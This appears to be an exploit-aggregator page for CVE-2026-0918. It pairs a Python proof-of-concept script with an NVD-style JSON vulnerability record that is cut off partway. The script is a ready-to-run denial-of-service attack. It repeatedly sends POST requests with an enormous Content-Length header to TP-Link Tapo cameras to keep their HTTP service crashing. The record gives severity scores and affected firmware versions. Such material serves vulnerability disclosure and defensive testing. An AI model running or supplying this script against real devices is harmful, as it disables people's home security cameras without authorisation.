CVE-2026-0918

#!/usr/bin/env python3 """ CVE-2026-0918 PoC - TP-Link Tapo Camera HTTP Service DoS Description: Send POST request with oversized Content-Length header to trigger NULL pointer dereference and crash the service. """ import socket import time import argparse def send_malicious_request(target_ip, target_port, content_length): """ Send a POST request with an excessively large Content-Length header to trigger the NULL pointer dereference vulnerability. Args: target_ip: Target camera IP address target_port: HTTP service port (default: 80) content_length: Oversized Content-Length value """ # Construct the malicious HTTP request request = f"POST / HTTP/1.1\r\n" request += f"Host: {target_ip}\r\n" request += f"Content-Length: {content_length}\r\n" request += "Connection: keep-alive\r\n" request += "\r\n" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) sock.send(request.encode()) print(f"[+] Malicious request sent with Content-Length: {content_length}") sock.close() return True except Exception as e: print(f"[-] Error sending request: {e}") return False def dos_attack(target_ip, target_port, iterations=10, delay=2): """ Perform denial of service attack by repeatedly sending malicious requests. Args: target_ip: Target camera IP address target_port: HTTP service port iterations: Number of attack iterations delay: Delay between requests in seconds """ print(f"[*] Starting DoS attack against {target_ip}:{target_port}") print(f"[*] Sending {iterations} malicious requests...") # Use an extremely large Content-Length value oversized_length = 99999999999999999 for i in range(iterations): print(f"[*] Iteration {i+1}/{iterations}") send_malicious_request(target_ip, target_port, oversized_length) time.sleep(delay) print("[*] Attack completed. Service should be continuously crashing.") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2026-0918 PoC') parser.add_argument('--target', required=True, help='Target IP address') parser.add_argument('--port', type=int, default=80, help='Target port (default: 80)') parser.add_argument('--iterations', type=int, default=10, help='Number of attack iterations') parser.add_argument('--delay', type=float, default=2.0, help='Delay between requests (seconds)') args = parser.parse_args() dos_attack(args.target, args.port, args.iterations, args.delay)

{"cve": {"id": "CVE-2026-0918", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-01-27T18:15:54.973", "lastModified": "2026-04-29T01:16:02.717", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tapo C100 v5, C220 v1 and C520WS v2 cameras’ HTTP service does not safely handle POST requests containing an excessively large Content-Length header. The resulting failed memory allocation triggers a NULL pointer dereference, causing the main service process to crash. An unauthenticated attacker can repeatedly crash the service, causing temporary denial of service. The device restarts automatically, and repeated requests can keep it unavailable."}, {"lang": "es", "value": "El servicio HTTP de las cámaras Tapo C220 v1 y C520WS v2 no maneja de forma segura las solicitudes POST que contienen una cabecera Content-Length excesivamente grande. La asignación de memoria fallida resultante desencadena una desreferenciación de puntero NULL, provocando la caída del proceso del servicio principal. Un atacante no autenticado puede provocar la caída repetida del servicio, causando una denegación de servicio temporal. El dispositivo se reinicia automáticamente, y las solicitudes repetidas pueden mantenerlo no disponible."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c220_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.2", "matchCriteriaId": "F337B275-4344-4B21-9C3F-5E01F56C8015"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tapo_c220:1:*:*:*:*:*:*:*", "matchCriteriaId": "671BCAEE-4AA0-4924-88E2-3B3C9087D171"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c520ws_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.3", "matchCriteriaId": "65DE4797-2C90-4C4A-BCA1-41F514F8153D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tapo_c520ws:2:*:*:*:*:*:*:*", "matchCriteriaId": "D8E6B561-8739-4823-9226-82FE5084EE01"}]}]}], "references": [{"url": "https://www.crac-learning.com/post/smart-home-security-research-cve-2026-0918-assigned", "source": "f23511db-6c3e-4e32-a477-6aa17d310630"}, {"url": "https://www.tp-link.com/en/support/download/tapo-c220/v1/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/en/support/download/tapo-c520ws/v2/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/download/tapo-c100/v5/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product" ... (truncated)